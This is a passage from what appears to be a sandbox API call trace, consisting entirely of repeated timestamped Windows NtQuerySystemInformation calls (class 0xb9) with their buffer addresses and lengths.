(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec30, Length=0x20, ResultLength=0x0) [0232.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff000, Length=0x50, ResultLength=0x0) [0232.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff000, Length=0x50, ResultLength=0x0) [0232.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff000, Length=0x50, ResultLength=0x0) [0232.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeef0, Length=0x50, ResultLength=0x0) [0232.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeef0, Length=0x50, ResultLength=0x0) [0232.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeef0, Length=0x50, ResultLength=0x0) [0232.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeef0, Length=0x50, ResultLength=0x0) [0232.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee20, Length=0x38, ResultLength=0x0) [0232.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec50, Length=0x28, ResultLength=0x0) [0232.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec50, Length=0x28, ResultLength=0x0) [0232.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec50, Length=0x28, ResultLength=0x0) [0232.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec50, Length=0x28, ResultLength=0x0) [0232.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffecc0, Length=0x28, ResultLength=0x0) [0232.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee20, Length=0x38, ResultLength=0x0) [0232.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffed40, Length=0x28, ResultLength=0x0) [0232.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffed40, Length=0x28, ResultLength=0x0) [0232.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffebe0, Length=0x20, ResultLength=0x0) [0232.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeb60, Length=0x20, ResultLength=0x0) [0232.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeb60, Length=0x20, ResultLength=0x0) [0232.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeb60, Length=0x20, ResultLength=0x0) [0232.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee20, Length=0x38, ResultLength=0x0) [0232.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee20, Length=0x38, ResultLength=0x0) [0232.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeca0, Length=0x20, ResultLength=0x0) [0232.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec30, Length=0x20, ResultLength=0x0) [0232.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec30, Length=0x20, ResultLength=0x0) [0232.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff000, Length=0x50, ResultLength=0x0) [0232.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff000, Length=0x50, ResultLength=0x0) [0232.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff000, Length=0x50, ResultLength=0x0) [0232.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeef0, Length=0x50, ResultLength=0x0) [0232.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeef0, Length=0x50, ResultLength=0x0) [0232.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeef0, Length=0x50, ResultLength=0x0) [0232.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeef0, Length=0x50, ResultLength=0x0) [0232.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee20, Length=0x38, ResultLength=0x0) [0232.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec50, Length=0x28, ResultLength=0x0) [0232.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec50, Length=0x28, ResultLength=0x0) [0232.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec50, Length=0x28, ResultLength=0x0) [0232.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec50, Length=0x28, ResultLength=0x0) [0232.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffecc0, Length=0x28, ResultLength=0x0) [0232.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee20, Length=0x38, ResultLength=0x0) [0232.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffed40, Length=0x28, ResultLength=0x0) [0232.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffed40, Length=0x28, ResultLength=0x0) [0232.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffebe0, Length=0x20, ResultLength=0x0) [0232.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeb60, Length=0x20, ResultLength=0x0) [0232.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeb60, Length=0x20, ResultLength=0x0) [0232.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeb60, Length=0x20, ResultLength=0x0) [0232.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee20, Length=0x38, ResultLength=0x0) [0232.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee20, Length=0x38, ResultLength=0x0) [0232.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeca0, Length=0x20, ResultLength=0x0) [0232.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec30, Length=0x20, ResultLength=0x0) [0232.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec30, Length=0x20, ResultLength=0x0) [0232.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec40, Length=0x20, ResultLength=0x0) [0232.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff4f8, Length=0x28, ResultLength=0x0) [0232.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff4f8, Length=0x28, ResultLength=0x0) [0232.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff4f8, Length=0x28, ResultLength=0x0) [0232.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff000, Length=0x50, ResultLength=0x0) [0232.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff000, Length=0x50, ResultLength=0x0) [0232.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff000, Length=0x50, ResultLength=0x0) [0232.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeef0, Length=0x50, ResultLength=0x0) [0232.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeef0, Length=0x50, ResultLength=0x0) [0232.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeef0, Length=0x50, ResultLength=0x0) [0232.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeef0, Length=0x50, ResultLength=0x0) [0232.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee20, Length=0x38, ResultLength=0x0) [0232.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec50, Length=0x28, ResultLength=0x0) [0232.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec50, Length=0x28, ResultLength=0x0) [0232.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec50, Length=0x28, ResultLength=0x0) [0232.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec50, Length=0x28, ResultLength=0x0) [0232.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffecc0, Length=0x28, ResultLength=0x0) [0232.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee20, Length=0x38, ResultLength=0x0) [0232.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffed40, Length=0x28, ResultLength=0x0) [0232.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffed40, Length=0x28, ResultLength=0x0) [0232.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffebe0, Length=0x20, ResultLength=0x0) [0232.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeb60, Length=0x20, ResultLength=0x0) [0232.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeb60, Length=0x20, ResultLength=0x0) [0232.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeb60, Length=0x20, ResultLength=0x0) [0232.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee20, Length=0x38, ResultLength=0x0) [0232.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee20, Length=0x38, ResultLength=0x0) [0232.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeca0, Length=0x20, ResultLength=0x0) [0232.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec30, Length=0x20, ResultLength=0x0) [0232.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec30, Length=0x20, ResultLength=0x0) [0232.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff080, Length=0x50, ResultLength=0x0) [0232.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff080, Length=0x50, ResultLength=0x0) [0232.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff080, Length=0x50, ResultLength=0x0) [0232.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffef70, Length=0x50, ResultLength=0x0) [0232.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffef70, Length=0x50, ResultLength=0x0) [0232.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffef70, Length=0x50, ResultLength=0x0) [0232.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffef70, Length=0x50, ResultLength=0x0) [0232.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeea0, Length=0x38, ResultLength=0x0) [0232.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffecd0, Length=0x28, ResultLength=0x0) [0232.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffecd0, Length=0x28, ResultLength=0x0) [0232.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.917] NtQuerySystemInformation 